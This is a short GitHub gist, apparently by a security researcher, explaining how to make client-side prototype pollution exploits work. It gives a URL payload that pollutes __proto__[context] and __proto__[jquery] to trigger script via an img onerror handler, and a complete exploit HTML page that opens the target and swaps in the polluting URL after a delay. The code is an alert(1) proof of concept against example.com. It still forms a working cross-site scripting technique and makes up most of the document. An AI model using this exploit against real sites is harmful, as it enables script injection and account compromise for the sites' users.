Skip to content

Instantly share code, notes, and snippets.

@harisec

harisec/client-side-prototype-pollution-expoitation.md

Last active January 24, 2022 10:02
Show Gist options
  • Save harisec/1cd9c3567d4fa4b2c848aa62fc1c1170 to your computer and use it in GitHub Desktop.
Save harisec/1cd9c3567d4fa4b2c848aa62fc1c1170 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
client-side-prototype-pollution-expoitation.md

I was trying to exploit a client-side prototype pollution and nothing was working.

I figured out that if you try to use a script gadget by visiting a URL like this dirrectly:

https://example.com/#&__proto__[context]=<img/src/onerror%3dalert(1)>&__proto__[jquery]=x

will not work because the page will not load properly as the prototype pollution will break the page.

So, I managed to get it working by first loading the page without the prototype pollution exploit and then after a few seconds replace the location with the prototype pollution exploit URL.

Example exploit page:

<script>
function exploit() {
	var win = window.open("https://example.com/#", "_blank");
	setTimeout(function () {
		win.location.replace("https://example.com/#&__proto__[context]=<img/src/onerror%3dalert(1)>&__proto__[jquery]=x");
	}, 5000);
}
</script>

<button onclick="exploit();">click me</button>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment